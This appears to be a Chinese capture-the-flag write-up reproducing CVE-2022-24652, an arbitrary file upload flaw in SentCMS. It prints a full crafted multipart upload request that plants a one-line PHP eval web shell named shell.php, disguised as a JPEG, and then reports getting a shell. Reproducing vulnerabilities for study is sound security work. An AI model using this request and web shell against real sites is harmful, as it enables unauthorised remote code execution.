CVE-2022-24652 漏洞复现

  • 开发
  • 69

CVE-2022-24652

开题

image-20240217160907617

后台管理是thinkphp的,但是工具没检测出漏洞。

image-20240217160935703

登陆后界面如下,上传头像功能值得引起注意

image-20240217162423183

这其实就是CVE-2022-24652,危险类型文件的不加限制上传,是文件上传漏洞。漏洞路由/user/upload/upload

参考文章:

阿里云漏洞库 (aliyun.com)

CVE-2022-24652|sentcms 4.0.x allows remote… - VULHUB开源网络安全威胁库

Sentcms任意文件上传漏洞 | Hanayuzu’Blog

image-20240217163203276

抓包上传文件,由于没有上传文件按钮,我们手动构建上传包。

修改包:

POST /user/upload/upload HTTP/1.1
Host: 7dd1d89b-bc28-43fc-9b42-a014dff41eea.vnctf2024.manqiu.top
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bdd5af1e5c92e47342e53886cecaced2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Length: 770


------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"

WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"

test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"

image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"

Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"

164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpeg

Jay17
<?php eval($_POST[1]);?>

------WebKitFormBoundaryrhx2kYAMYDqoTThz--

image-20240217163823624

访问呢恶意文件,getshell

image-20240217164029557

阅读全部

相关推荐

  8. 漏洞】NotificationX SQL注入漏洞(CVE-2024-1698)

    2024-02-18 06:54:01       45 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-02-18 06:54:01       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-02-18 06:54:01       100 阅读

  9. 在Django里面运行非项目文件

    2024-02-18 06:54:01       82 阅读

  19. Python语言-面向对象

    2024-02-18 06:54:01       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-02-18 06:54:01       85 阅读

热门阅读

  2. Vue3.0(八):网络请求库axios

    2024-02-18 06:54:01       57 阅读

  3. 将JWT令牌存储到浏览器中localStorage中,并且往页面请求头中添加token

    2024-02-18 06:54:01       52 阅读

  5. YOLOv8改进 | Neck篇 | 当SDI碰上BiFPN形成全新的特征金字塔网络(全网独家创新)

    2024-02-18 06:54:01       62 阅读

  6. springboot第55集:思维导图Sharding-JDBC,事务,微服务分布式架构周刊

    2024-02-18 06:54:01       34 阅读

  12. python中线程/线程池,进程/进程池的创建

    2024-02-18 06:54:01       50 阅读

  16. 【Ubuntu内核】解决Ubuntu 20.04更新内核后无法联网的问题

    2024-02-18 06:54:01       52 阅读

  17. 学习Android的第十四天

    2024-02-18 06:54:01       51 阅读

  19. 【无标题】

    2024-02-18 06:54:01       50 阅读

  21. ABC341A-D题解

    2024-02-18 06:54:01       50 阅读

  24. 快速实现用户认证:使用Python和Flask配合PyJWT生成与解密Token的教程及示例代码

    2024-02-18 06:54:01       41 阅读

  25. 寿司转盘,用 C 编码

    2024-02-18 06:54:01       57 阅读

  27. Pytorch的安装教程,解决jupyter不能使用pytorch的问题

    2024-02-18 06:54:01       59 阅读

  28. 每日OJ题_算法_递归⑤力扣50. Pow(x, n)

    2024-02-18 06:54:01       62 阅读

  29. 【Docker项目实战】使用Docker部署Windows系统(详细教程)

    2024-02-18 06:54:01       65 阅读

  30. JVM的类的生命周期

    2024-02-18 06:54:01       48 阅读